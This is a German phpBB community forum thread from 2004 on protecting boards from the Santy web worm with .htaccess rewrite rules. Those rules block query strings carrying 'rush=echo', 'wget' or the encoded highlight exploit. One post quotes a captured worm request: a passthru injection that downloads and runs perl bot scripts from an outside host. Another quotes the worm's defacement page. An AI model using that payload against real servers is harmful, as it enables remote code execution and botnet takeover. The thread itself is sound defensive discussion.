Schutz vor dem phpBB-Wurm mittels .htaccess

Hier die Newsecke (Kein Support!)
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Schutz vor dem phpBB-Wurm mittels .htaccess

Beitrag von oxpus »

Neben dem CrackerTracker von cback ist der Schutz mittels .htaccess auch zu empfehlen.
Folgendes ist dazu in eine .htaccess-Datei zu schreiben, die auf dem Hauptverzeichnis Eures Webspaces liegen muss:

Code: Alles auswählen

RewriteEngine On

# prevent access from santy webworm
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
Original-Post hierzu auf phpbb.de, Autor des Codes: larsneo
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Cool - Ich hab das jetzt seit ca. 1 Stunde in meiner .htaccess und der CTracker hat kaum noch was zu tun. :D
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
adjustMan
Beiträge: 205
Registriert: Sa 18.Sep, 2004 00:03

Re: Schutz vor dem phpBB-Wurm mittels .htaccess

Beitrag von adjustMan »

[quote="oxpus - Mi 29.Dez, 2004 20:10";p="19461"]Neben dem CrackerTracker von cback ist der Schutz mittels .htaccess auch zu empfehlen.
Folgendes ist dazu in eine .htaccess-Datei zu schreiben, die auf dem Hauptverzeichnis Eures Webspaces liegen muss[/quote]
Im root Verzeichnis vom Webspace oder vom Forum?
PS: Ich habe auch ohne .htaccess seit vorgestern keine Angriffe mehr. Wundert mich`n bisschen. :confused:
cu aM
Benutzeravatar
Bootenks
Beiträge: 1836
Registriert: Sa 29.Mai, 2004 23:36
Wohnort: G?rlitz (?stlichste Stadt Deutschlands)

Beitrag von Bootenks »

also in root von Webspace sonst ist das ja sinnlos ;) sonst sperrste dich ja von deinem eigenem Foum :-P
Nur ein Informatik Student. ^^
Benutzeravatar
adjustMan
Beiträge: 205
Registriert: Sa 18.Sep, 2004 00:03

Beitrag von adjustMan »

@Bootenks

Und was sagst zu meinem PS? Is das normal, 2 Tage keine Angriffe. (Ich bin ja froh :) )
cu aM
Benutzeravatar
cbrkiter
Beiträge: 170
Registriert: Fr 26.Nov, 2004 01:30
Kontaktdaten:

Beitrag von cbrkiter »

Also mit .htaccess kenne ich mich überhaupt nicht aus. Ich weiß zwar, dass einiges damit möglich sein soll, aber bisher habe ich nie wirklich irgendwas ausprobiert - geschweige denn mich damit informell beschäfftigt. Daher mal 'ne kurze Frage:

Ich habe in meiner .htaccess bereits folgende Zeile:

Code: Alles auswählen

DirectoryIndex index.html intro.php portal.php index.php index.htm
Soll ich den neuen Text nun vor oder hinter dieser Zeile einfügen? Ist das egal oder beißt sich dann irgendwas?
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Hinter die Zeile.
Und danach ist wirklich Ruhe. Mein Logfile vom CrackerTracker ist seitdem leer.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

*lach*
wär bei mir auch so, nach einbau der .htaccess hat mein Server selbst mich gar nich mehr aufs Forum gelassen lool :D
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Tjoar, liegt wohl an Deinem Apache, der etwas anders arbeiten möchte, oder?
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Jo mein Apache 2.0.52 scheint nen eigenen Willen zu haben :D
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Also nachdem ich den Code in der .htaccess des Server Root hatte, ist der CTracker zu ca. 70% Arbeitslos gewesen. :) Und nachdem ich den Code in die .htaccess des Board-Roots gesetzt hab, ist komplett ruhe. :D
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

"Er" wird übrigens wieder recht aktiv wie man hier sieht:

http://www.kdeuser.de

aber eins muss man dem Wurm lassen, er macht konformes html:

Code: Alles auswählen

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>This site is defaced!!!</TITLE>
</HEAD><BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR>
<ADDRESS><b>NeverEverNoSanity WebWorm generation 21.</b></ADDRESS>
</BODY></HTML>
Zuletzt geändert von cback am Do 30.Dez, 2004 12:48, insgesamt 1-mal geändert.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

aber eins muss man dem Wurm lassen, er macht konformes HTML
:lol:
Na wenn das das Einzigste wäre, was er täte ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Bootenks
Beiträge: 1836
Registriert: Sa 29.Mai, 2004 23:36
Wohnort: G?rlitz (?stlichste Stadt Deutschlands)

Beitrag von Bootenks »

also wenn ich es in mein root des boards packe dann komm ich selber nimmer rein, desshalb habe ich ihn in den root des Webspace getan und es scheint och zu funzen ;)
Nur ein Informatik Student. ^^
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Da muss es ja auch hin: In den Root des Webspaces.

cback: Hier den gleichen Fehler gemacht?
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

nö in dem Punkt alles korrrrrrrrrrrekt gemacht ;)

Hab noch andere Dinge probiert doch
1000x probiert, 1000x is nichts passiert.... ^7 (bzw. DAS passiert) ;)
Zuletzt geändert von cback am Do 30.Dez, 2004 16:04, insgesamt 1-mal geändert.
frank1606
Beiträge: 47
Registriert: Fr 13.Aug, 2004 13:01
Kontaktdaten:

Beitrag von frank1606 »

Hallo

also ich hab auch alles eingebaut , aber bei mir steht da nichts in der Logfile.

Hänge mal die Viewtopic an.
Beschreibunhier die Viewtopic.php

Die Url ist www.tierfreunde-forum.net
Kann mir da einer Helfen??

Danke
Bild
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

also ich hab auch alles eingebaut , aber bei mir steht da nichts in der Logfile.
Das ist Dir auch weiterhin zu wünschen, denn dann hat der Wurm Dein Board noch nicht entdeckt.
Ich habe jetzt einen Eintrag verursache, indem ich einen Test gemacht habe. Und der war erfolgreich.
Also kein Grund zur Besorgnis, der Schutz wirkt bei Dir 100%ig.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
adjustMan
Beiträge: 205
Registriert: Sa 18.Sep, 2004 00:03

Beitrag von adjustMan »

kann man diese anweisungen nicht gleich in die httpd.conf schreiben?
cu aM
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Das ist Dir auch weiterhin zu wünschen, denn dann hat der Wurm Dein Board noch nicht entdeckt.
Na darüber kann man jetzt streiten!
Der Sanity sucht sich seine Opfer, meines wissens nach, über Google. Wenn er ein Board schon nicht findet, dann ist das bei neuen Usern auch nicht viel besser. :(
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
blondi
Beiträge: 1091
Registriert: Do 30.Sep, 2004 14:36

Beitrag von blondi »

nicht nur über google mittlerweilen auch via yahoo...
Benutzeravatar
blondi
Beiträge: 1091
Registriert: Do 30.Sep, 2004 14:36

Beitrag von blondi »

@cback & Oxpus...

mir ist eben aufgefallen das der wurm nun einen bot nutz...

Code: Alles auswählen

LWP::Simple/5.53
t=58&rush=echo%20_START_%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://xiahello.com/mw/bot.htm;wget%20http://xiahello.com/mw/ssh.htm;perl%20ssh.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';
lieben gruss
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

@adjustMan
Nein, da werden diese nicht beachtet. die httpd.conf beinhaltet lediglich Einstellungen des Webservers selber, nicht dessen Funktionweise in bestimmten Verzeichnissen.

@blondi
Das macht der Wurd schon länger. Und solange Du diesen Eintrag im CrackerTracker Log siehst, ist noch alles i.O., denn dann hat der Mod ihn abgefangen.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
blondi
Beiträge: 1091
Registriert: Do 30.Sep, 2004 14:36

Beitrag von blondi »

Aha... Danke für die Info

Lieben Gruss
Benutzeravatar
adjustMan
Beiträge: 205
Registriert: Sa 18.Sep, 2004 00:03

Beitrag von adjustMan »

[quote="oxpus - So 02.Jan, 2005 09:55";p="19698"]@adjustMan
Nein, da werden diese nicht beachtet. die httpd.conf beinhaltet lediglich Einstellungen des Webservers selber, nicht dessen Funktionweise in bestimmten Verzeichnissen.[/quote]
Wenn ich das bei mir ins Webspace schiebe, bekomme ich ein Forbidden. Und im Rootforum steht. dass man das, um alle Vhosts "mitzunehmen", ans Ende der httpd.conf setzen soll
cu aM
Antworten